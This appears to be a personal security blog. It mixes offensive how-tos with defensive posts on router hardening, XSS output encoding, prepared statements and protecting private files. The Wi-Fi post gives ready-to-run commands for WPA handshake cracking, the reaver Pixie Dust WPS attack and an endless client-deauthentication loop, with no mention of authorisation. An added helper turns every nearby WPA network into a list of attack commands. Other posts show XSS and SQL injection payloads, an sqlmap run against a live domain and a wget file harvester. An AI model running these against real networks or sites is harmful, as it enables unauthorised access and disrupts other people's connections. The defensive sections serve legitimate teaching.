Hacking Wi-Fi

March 5, 2018

Here are two methods to break into a Wi-Fi network (a WPA handshake capture with an offline dictionary attack, and the Pixie Dust attack on WPS) and a script to disconnect any client from a router.

---[Common Steps]---



# kill the processes that interfere with the wireless card (NetworkManager, wpa_supplicant, dhclient)
airmon-ng check kill

# put the card into monitor mode; this creates the wlan0mon interface used below
airmon-ng start wlan0

# list nearby networks and their clients; note the BSSID and channel of the target
airodump-ng wlan0mon

---[Method 1: Password crack]---


# capture on the target's channel only; -w is an output prefix, the capture lands in wifi-hack-01.cap
airodump-ng --ignore-negative-one -c [channel] -w wifi-hack --bssid [BSSID] wlan0mon

# in a second terminal, deauthenticate the clients so they reconnect and send a fresh handshake;
# -0/--deauth 10 sends 10 deauth bursts; omit -c to hit every station, add -c [station MAC] to target one
aireplay-ng --deauth 10 --ignore-negative-one -a [BSSID] [-c station MAC, optional] wlan0mon

# keep airodump-ng running until its top line reads "WPA handshake: [BSSID]"

# crack the passphrase offline against a wordlist (only a passphrase in the list is found)
aircrack-ng -w [passwordlist] -b [BSSID] wifi-hack-01.cap

---[Method 2: Pixie Dust(WPS)]---


# -vv is very verbose; -K 1 runs pixiewps on the PKE, PKR, E-Hash1, E-Hash2 and E-Nonce
# gathered from the WPS exchange (the Pixie Dust weakness in Ralink, Broadcom and Realtek chipsets);
# the router must have WPS enabled for this to work at all
reaver -i wlan0mon -b [BSSID] -vv -K 1

---[Method 3: Deauthentication of client]---


#!/bin/sh
# usage: ./deauth-loop.sh [BSSID] [station MAC] wlan0mon
while true; do
    aireplay-ng -0 5 -a "$1" -c "$2" "$3"
    sleep 3
done
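The -w prefix in Method 1 also makes airodump-ng write wifi-hack-01.csv, which is easier to mine than the terminal screen when there are many networks. The following is an added Python example, not code from this post: it parses a constructed dump in airodump-ng's CSV layout (two comma-separated tables, access points then stations, as written by the aircrack-ng versions I have used; check the header line of your own file if the column order differs), keeps the WPA-PSK access points that Method 1 applies to, lists the clients associated with each for aireplay-ng's -c, and prints the Method 1 commands with BSSID and channel filled in. The sample data and helper names are mine.

```python
"""Parse airodump-ng's CSV dump and turn it into Method 1 targets.

The file holds two comma-separated tables separated by a blank line: the
access-point table (header begins with "BSSID") and the station table
(header begins with "Station MAC"). Cells are space padded, so every cell
is stripped. Probed ESSIDs are themselves comma separated, so for stations
everything from the seventh column on is collected into one list.
"""
import csv
import io

# Constructed sample in airodump-ng's CSV layout; not a real capture.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2018-03-05 07:20:01, 2018-03-05 07:25:30,  6,  54, WPA2, CCMP, PSK, -42,      310,        0,   0.  0.  0.  0,   7, HomeNet,
AA:BB:CC:DD:EE:02, 2018-03-05 07:20:03, 2018-03-05 07:25:29, 11,  54, WEP, WEP, , -70,       88,      512,   0.  0.  0.  0,   6, OldNet,
AA:BB:CC:DD:EE:03, 2018-03-05 07:20:05, 2018-03-05 07:25:28,  1,  54, OPN, , , -80,       20,        0,   0.  0.  0.  0,   4, Cafe,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2018-03-05 07:21:00, 2018-03-05 07:25:30, -50,       35, AA:BB:CC:DD:EE:01, HomeNet
11:22:33:44:55:77, 2018-03-05 07:22:10, 2018-03-05 07:25:12, -61,       12, AA:BB:CC:DD:EE:01,
11:22:33:44:55:88, 2018-03-05 07:23:40, 2018-03-05 07:25:00, -66,        4, (not associated), HomeNet,Cafe
"""


def parse_airodump_csv(text):
    """Return (access_points, stations) as two lists of dicts."""
    aps, stations = [], []
    section = None
    for row in csv.reader(io.StringIO(text)):
        cells = [c.strip() for c in row]
        if not any(cells):              # blank separator line
            continue
        if cells[0] == "BSSID":         # access-point table header
            section = "ap"
            continue
        if cells[0] == "Station MAC":   # station table header
            section = "sta"
            continue
        if section == "ap":
            aps.append({
                "bssid": cells[0], "channel": int(cells[3]), "privacy": cells[5],
                "cipher": cells[6], "auth": cells[7], "power": int(cells[8]),
                "essid": cells[13],
            })
        elif section == "sta":
            stations.append({
                "station": cells[0], "power": int(cells[3]), "packets": int(cells[4]),
                "bssid": cells[5], "probed": [p for p in cells[6:] if p],
            })
    return aps, stations


def wpa_targets(aps):
    """Access points Method 1 applies to: WPA/WPA2 with a pre-shared key,
    strongest signal first (power is in dBm, so -42 beats -80)."""
    return sorted(
        (ap for ap in aps if ap["privacy"].startswith("WPA") and ap["auth"] == "PSK"),
        key=lambda ap: ap["power"], reverse=True,
    )


def stations_of(stations, bssid):
    """Client MACs currently associated with a BSSID, for aireplay-ng -c."""
    return [s["station"] for s in stations if s["bssid"].upper() == bssid.upper()]


def method1_commands(ap, stations, iface="wlan0mon", prefix="wifi-hack"):
    """The Method 1 command lines for one target, same flags as in the post."""
    cmds = [f"airodump-ng -c {ap['channel']} -w {prefix} --bssid {ap['bssid']} {iface}"]
    clients = stations_of(stations, ap["bssid"])
    if clients:   # a targeted deauth forces a quick reconnect, hence a handshake
        cmds += [f"aireplay-ng --deauth 10 -a {ap['bssid']} -c {c} {iface}" for c in clients]
    else:         # nobody associated: broadcast and wait for a client to appear
        cmds.append(f"aireplay-ng --deauth 10 -a {ap['bssid']} {iface}")
    cmds.append(f"aircrack-ng -w [passwordlist] -b {ap['bssid']} {prefix}-01.cap")
    return cmds


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for ap in wpa_targets(aps):
        print(f"# {ap['essid']} ({ap['bssid']}) channel {ap['channel']}, {ap['power']} dBm")
        print("\n".join(method1_commands(ap, stations)))
```

Running it against a real dump is `parse_airodump_csv(open("wifi-hack-01.csv").read())`; the WEP and open networks in the sample are filtered out on purpose, since Method 1 only makes sense for a PSK handshake.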

Protecting Wi-Fi

September 25, 2017

Protecting your Wi-Fi starts at the access point: the router.

You will need to make several changes in the router configuration; here is the checklist:

  1. Change the username for the administrator login of the router
  2. Change the administrator password
  3. Change the SSID (the name of the access point) from the default to a custom one
  4. Activate encryption: WPA2 with a long, random passphrase (don't use WEP, it is broken; a short or dictionary passphrase falls to the aircrack-ng attack described above)
  5. Enable the router firewall
  6. Turn off the guest network if you don't use it
  7. Update the router firmware
  8. Turn off WPS (Wi-Fi Protected Setup); it is exactly what the Pixie Dust attack above targets
  9. Turn off SSID broadcasting (this only stops casual discovery; airodump-ng still sees the network)
  10. Disable DHCP (an attacker can still set an address by hand, so treat this as an obstacle, not a control)
  11. Only allow specific MAC addresses to connect (an attacker can spoof a MAC seen in airodump-ng, so again an obstacle, not a control)
  12. Route the router's traffic through a VPN you trust

Protection against XSS Injections

September 24, 2017

So here we are with user-generated content, for example a message to put on a message board.

The easiest way to filter and protect ourselves from XSS injections is to strip the tags from the output, disabling HTML content completely. Note that strip_tags() throws the markup away rather than displaying it, so users lose anything that looked like a tag; where the text must be kept exactly as entered, encode it instead with htmlspecialchars($row['Name'], ENT_QUOTES, 'UTF-8'). Either way, the value must never reach the page raw.

<?php
    $result = $mysqli->query("SELECT Name FROM City ORDER BY ID LIMIT 5");
    while ($row = $result->fetch_assoc()) {
?>
          <p><?php echo strip_tags($row['Name']); ?></p>
<?php
    }
?>

So a stored value of:

          <a href="#">TEST</a>

is output as:

          <p>TEST</p>

Hacking by XSS Injections

September 24, 2017

Cross-site scripting (XSS) is a vulnerability that lets an attacker inject a script of their choosing into a page our application serves to other users.

Here is a simple output from our application:

<?php
    $result = $mysqli->query("SELECT Name FROM City ORDER BY ID LIMIT 5");
    while ($row = $result->fetch_assoc()) {
?>
          <p><?php echo $row['Name']; ?></p>
<?php
    }
?>

As innocent as this output may be, there lies a potential danger of XSS injection here.

What if the row contained HTML? Then it can contain scripts, and the browser runs them in our site's origin, with access to our users' cookies and sessions:

<?php
    $result = $mysqli->query("SELECT Name FROM City ORDER BY ID LIMIT 5");
    while ($row = $result->fetch_assoc()) {
?>
          <p><?php echo $row['Name']; ?></p>
<?php
    }
?>

becomes:

          <p><script src="malicious-script.js" type="text/javascript"></script></p>

or:

          <p><img src="http://url.to.file.which/not.exist" onerror="alert(document.cookie);" /></p>
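The code on this page is PHP; the following is an added Python example, not code from the post, because the lesson is the same in any language: html.escape(s, quote=True) does what htmlspecialchars($s, ENT_QUOTES) does. It renders the two payloads from the post three ways (raw, as the vulnerable loop does; through a home-made regex tag stripper, which is a stand-in for the replacements people write for strip_tags and not for strip_tags itself; and encoded) and adds an attribute context, which needs the quotes encoded as well. The sample rows are constructed, and contains_markup is a check for the demonstration, not a sanitizer.

```python
"""Output encoding versus tag stripping, shown on the payloads from the post.

html.escape(s, quote=True) turns every character that can open a tag,
attribute or entity (& < > " ') into an entity, so the browser shows the
text instead of interpreting it.
"""
import html
import re

# Constructed "database rows": the two payloads from the post, two benign
# values a stripper damages, and an unterminated tag a regex stripper misses.
ROWS = [
    "Montreal",
    '<script src="malicious-script.js" type="text/javascript"></script>',
    '<img src="http://url.to.file.which/not.exist" onerror="alert(document.cookie);" />',
    "Tom & Jerry <3",
    "<img src=x onerror=alert(document.cookie)//",   # no closing '>'
]

TAG_RE = re.compile(r"<[^>]*>")


def render_vulnerable(name):
    """<p><?php echo $row['Name']; ?></p> from the post: the raw value into the page."""
    return f"<p>{name}</p>"


def render_regex_stripped(name):
    """A home-grown tag stripper. It removes complete tags only: a tag with no
    closing '>' survives, and the browser still closes it at the next '>'."""
    stripped = TAG_RE.sub("", name)
    return f"<p>{stripped}</p>"


def render_escaped(name):
    """Encode for the HTML body context: the safe default, nothing is lost."""
    return f"<p>{html.escape(name, quote=True)}</p>"


def render_attribute(name):
    """Encode for a double-quoted attribute; quote=True is what stops the
    '" onmouseover="...' style of break-out."""
    return f'<input name="city" value="{html.escape(name, quote=True)}">'


def contains_markup(rendered, wrapper="p"):
    """True if anything other than the wrapper tags survived as real markup
    (demonstration check only)."""
    inner = rendered[len(f"<{wrapper}>"):-len(f"</{wrapper}>")]
    return "<" in inner or ">" in inner


if __name__ == "__main__":
    for name in ROWS:
        print("raw     :", render_vulnerable(name))
        print("stripped:", render_regex_stripped(name))
        print("escaped :", render_escaped(name))
        print()
```

The benign "Tom & Jerry <3" shows why encoding beats stripping: the encoded output displays exactly what was typed, whereas any stripper has to guess what is markup and what is text.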

Protection from SQL Injections

September 24, 2017

There are several ways to protect ourselves from SQL injection. The important part is to apply the protection to every parameter of the entire application: a single unprotected parameter leaves the application open to intrusion.

Object oriented style

/* this query with escaped $city will work */
$city = $mysqli->real_escape_string($city);
if ($mysqli->query("INSERT into myCity (Name) VALUES ('$city')")) {
    printf("%d Row inserted.\n", $mysqli->affected_rows);
}

Procedural style

/* this query with escaped $city will work */
$city = mysqli_real_escape_string($link, $city);
if (mysqli_query($link, "INSERT into myCity (Name) VALUES ('$city')")) {
    printf("%d Row inserted.\n", mysqli_affected_rows($link));
}

What happens is that the escaped value is locked inside the string literal: a quote in the input can no longer close the literal, so the rest of the input stays data. This only works when the value really is inside quotes; an unquoted number such as WHERE x=$id gets no protection from escaping at all. A prepared statement (bind_param) is the better fix for every parameter, because the value travels separately from the SQL and can never be parsed as part of it.

Entries secured!

Hacking with SQL Injections

September 24, 2017

Here is the heavy artillery for SQL injection attacks, sqlmap, pointed at a WordPress admin URL:

sqlmap -u http://luclaverdure.com/wp-admin --time-sec 15

      __H__
 ___ ___[,]_____ ___ ___  {1.1.9#stable}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 07:26:44

[07:26:45] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] y
[07:26:58] [INFO] testing connection to the target URL
sqlmap got a 301 redirect to 'http://luclaverdure.com/wp-admin/'. Do you want to follow? [Y/n] y
[07:27:05] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[07:27:35] [WARNING] turning off pre-connect mechanism because of connection time out(s)
[07:27:35] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N] y
[07:27:48] [WARNING] dropping timeout to 10 seconds (i.e. '--timeout=10')
[07:27:48] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[07:28:20] [CRITICAL] WAF/IPS/IDS identified as 'Generic (Unknown)'
[07:28:20] [WARNING] WAF/IPS/IDS specific response can be found in '/tmp/sqlmapnu5FKO3050/sqlmapresponse-2sf3SM'. If you know the details on used protection please report it along with specific response to 'dev@sqlmap.org'
are you sure that you want to continue with further target testing? [y/N] y
[07:28:42] [WARNING] please consider usage of tamper scripts (option '--tamper')
[07:28:42] [INFO] testing if the target URL is stable
[07:28:45] [WARNING] URI parameter '#1*' does not appear to be dynamic
[07:28:46] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[07:28:47] [INFO] testing for SQL injection on URI parameter '#1*'
[07:28:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:28:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[07:28:55] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it with option '--dbms'
[07:29:05] [WARNING] there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests
[07:29:05] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[07:29:36] [CRITICAL] connection timed out to the target URL
[07:29:46] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[07:30:16] [CRITICAL] connection timed out to the target URL
[07:30:26] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[07:30:56] [CRITICAL] connection timed out to the target URL

An SQL injection is based upon a parameter, in this case a field from a form.

Take the following simple SQL query to fetch city information from the database:

$mysqli = new mysqli("localhost", "my_user", "my_password", "test");
$more = $mysqli->query("SELECT * FROM City WHERE x=".$_GET['parameter'].";");

The expected parameter is a number.

However, what if the parameter was:

0 OR 1=1; --

We are in big trouble: the WHERE clause is now true for every row, and the -- comments the rest of the SQL statement out of the equation.

You guessed it, the same can be applied to a login form:

$mysqli->query("SELECT user FROM users WHERE id='".$_GET['id']."' AND password='".md5($_GET['pwd'])."'");

Our SQL injector:

1' OR 1=1; --

Becoming:

SELECT user FROM users WHERE id='1' OR 1=1; --' AND password='...md5 of whatever was typed...'

Everything after the -- is a comment, so the password check is gone and the first user is returned: the password was bypassed.
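The following is an added Python example, not code from the post, that runs both injections above (the unquoted numeric parameter and the quoted login) against an in-memory SQLite database and puts the three options from the protection post side by side: no protection, escaping only, and bound parameters. It shows the caveat a reader should take away from mysqli_real_escape_string: escaping saves the quoted login but does nothing for WHERE x=..., while a bound parameter fixes both. The tables, rows and passwords are constructed; the trailing semicolon of the payloads is dropped because sqlite3's execute() runs one statement at a time, and the password is hashed with sha256 where the post uses md5, which changes nothing about the injection.

```python
"""The post's two injections against an in-memory SQLite database, with
no protection, escaping only, and bound parameters side by side."""
import hashlib
import sqlite3


def digest(pwd):
    # The post hashes with md5(); sha256 here, the injection does not depend on it.
    return hashlib.sha256(pwd.encode()).hexdigest()


def make_db():
    """Constructed sample data standing in for the post's City and login tables."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE City (x INTEGER PRIMARY KEY, Name TEXT);
        INSERT INTO City VALUES (1, 'Montreal'), (2, 'Quebec'), (3, 'Ottawa');
        CREATE TABLE users (id TEXT, user TEXT, password TEXT);
    """)
    db.execute("INSERT INTO users VALUES (?, ?, ?)", ("1", "admin", digest("s3cret")))
    return db


def escape_quotes(value):
    """What real_escape_string buys you, in SQLite's dialect: a quote inside a
    string literal is doubled. It changes nothing outside quotes."""
    return value.replace("'", "''")


# --- the City lookup: an unquoted numeric parameter --------------------------

def city_vulnerable(db, parameter):
    """Same shape as the post: 'SELECT * FROM City WHERE x=' . $_GET['parameter']"""
    return db.execute("SELECT * FROM City WHERE x=" + parameter + ";").fetchall()


def city_escaped(db, parameter):
    """Escaping only: useless here, the value is not inside quotes."""
    return db.execute("SELECT * FROM City WHERE x=" + escape_quotes(parameter) + ";").fetchall()


def city_safe(db, parameter):
    """Bound parameter: the value is data and can never become SQL."""
    return db.execute("SELECT * FROM City WHERE x=?", (parameter,)).fetchall()


# --- the login: quoted string parameters -------------------------------------

def login_vulnerable(db, user_id, pwd):
    q = ("SELECT user FROM users WHERE id='" + user_id
         + "' AND password='" + digest(pwd) + "'")
    row = db.execute(q).fetchone()
    return row[0] if row else None


def login_escaped(db, user_id, pwd):
    """Escaping works here because both values sit inside quotes."""
    q = ("SELECT user FROM users WHERE id='" + escape_quotes(user_id)
         + "' AND password='" + escape_quotes(digest(pwd)) + "'")
    row = db.execute(q).fetchone()
    return row[0] if row else None


def login_safe(db, user_id, pwd):
    row = db.execute("SELECT user FROM users WHERE id=? AND password=?",
                     (user_id, digest(pwd))).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "0 OR 1=1 --"          # the post's payload, semicolon dropped
    print(city_vulnerable(db, payload))   # every row
    print(city_escaped(db, payload))      # still every row
    print(city_safe(db, payload))         # []
    login = "1' OR 1=1 --"
    print(login_vulnerable(db, login, "wrong"))  # admin
    print(login_escaped(db, login, "wrong"))     # None
    print(login_safe(db, login, "wrong"))        # None
```

The bound-parameter version of the City query returns nothing for the payload because the whole string is compared against the integer column as one value; with a real id such as "2" it returns the one row, so correctness is not traded for safety.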

Protecting Private Files

September 24, 2017

To protect ourselves from leaking private documents, we need to understand the architecture and directory structure of our project.

Directory Structure:

[chroot]
+  ->  [htdocs]  -> [page.htm]
|                -> [access-private.php]
|                -> [public uploads] -> [public-report1.pdf]
+  ->  [private] -> [private-report.pdf]

Since the uploads folder is within the htdocs folder, everything in it is publicly accessible, whatever its name.

The private folder sits beside htdocs, outside the document root, so if a user browses to the url:

http://luclaverdure.com/../private/test

the web server resolves the path within htdocs and the user cannot reach files that sit at the same level as htdocs or above it.

If the browser can't fetch the file directly, how can it be viewed by authorized personnel?

We'll need to verify that the user is logged in and has the right, then read the file and output it to the client only if the check passes.

In pseudocode (the two helpers are your own), access-private.php:

if ( is_user_logged_in() && user_has_access_right('private-reports') ) {
    header('Content-Type: application/pdf');
    readfile(__DIR__ . '/../private/private-report.pdf');  // send the bytes; file_get_contents() alone only reads them
} else {
    http_response_code(403);
}

Ensure the Apache configuration sets DocumentRoot to htdocs, with private beside it rather than inside it (and inside the chroot if you use one), and voila, it is secret, it is safe.
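The post hardcodes the file name. The following is an added Python example, not the post's code, that goes one step further and takes the name from the request, which is where the next mistake appears: a "../" in the name walks right back out of the private folder. It performs the same two checks as access-private.php (logged in, has the right) and adds the containment check that keeps the resolved path inside the private directory. The user dict stands in for is_user_logged_in()/user_has_access_right(), and the directory tree from the diagram is constructed in a temporary folder.

```python
"""Serve a file from a directory outside the document root, only to an
authorised user, and only if the requested name stays inside that directory."""
import os
import tempfile
from pathlib import Path


class Forbidden(Exception):
    pass


class NotFound(Exception):
    pass


def serve_private(private_dir, requested_name, user):
    """Return (headers, body) for a file under private_dir.

    `user` is a dict with 'logged_in' and 'rights', a stand-in for the post's
    is_user_logged_in() / user_has_access_right() helpers.
    """
    # 1. authorisation first, before touching the filesystem at all
    if not (user.get("logged_in") and "private-reports" in user.get("rights", ())):
        raise Forbidden("login with the private-reports right is required")

    # 2. containment: resolve symlinks and '..', then insist the result is
    #    still below the private directory (rejects ../x and absolute names)
    base = Path(private_dir).resolve()
    target = (base / requested_name).resolve()
    if target == base or os.path.commonpath([str(base), str(target)]) != str(base):
        raise Forbidden("requested name escapes the private directory")

    if not target.is_file():
        raise NotFound(requested_name)

    # 3. send it as a download, never as something the browser may interpret
    #    in the site's origin
    content_type = "application/pdf" if target.suffix.lower() == ".pdf" else "application/octet-stream"
    headers = {
        "Content-Type": content_type,
        "Content-Disposition": f'attachment; filename="{target.name}"',
        "X-Content-Type-Options": "nosniff",
    }
    return headers, target.read_bytes()


def build_demo_tree():
    """Constructed layout from the post: [root]/htdocs is the DocumentRoot,
    [root]/private sits beside it, plus one file outside both."""
    root = Path(tempfile.mkdtemp(prefix="privdemo-"))
    (root / "htdocs").mkdir()
    (root / "private").mkdir()
    (root / "private" / "private-report.pdf").write_bytes(b"%PDF-1.4 constructed sample\n")
    (root / "outside.txt").write_text("must never be served\n")
    return root


def demo():
    """Exercise the handler; returns a label -> outcome map."""
    root = build_demo_tree()
    private = root / "private"
    staff = {"logged_in": True, "rights": {"private-reports"}}
    anon = {"logged_in": False, "rights": set()}
    cases = [
        ("ok", "private-report.pdf", staff),
        ("anon", "private-report.pdf", anon),
        ("traversal", "../outside.txt", staff),
        ("absolute", str(root / "outside.txt"), staff),
        ("missing", "nope.pdf", staff),
    ]
    results = {}
    for label, name, user in cases:
        try:
            headers, body = serve_private(private, name, user)
            results[label] = ("served", headers["Content-Type"], len(body))
        except Forbidden:
            results[label] = ("forbidden",)
        except NotFound:
            results[label] = ("notfound",)
    return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(f"{label:10} {outcome}")
```

The order of the checks matters: authorisation comes before any filesystem access, so an anonymous user cannot even probe which names exist, and the existence check comes after containment, so a traversal attempt gets "forbidden" rather than a hint about files outside the folder.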

Hacking Private Files

September 24, 2017

Here is a simple script that lets anyone crawl your entire website for a specific file type and download every file found: -r follows every link recursively, -A keeps only the names matching the given suffix, -nd drops the directory structure, -nv quiets the output and -e robots=off ignores robots.txt. So "hiding" a document by leaving it out of the menu is no protection at all if anything on the site links to it.

wscanner.sh:

#!/bin/sh
wget -e robots=off -nd -nv -r -A "$1" "http://$2"

Usage:

./wscanner.sh .pdf luclaverdure.com


© 2023 LucLaverdure.com — All Rights Reserved.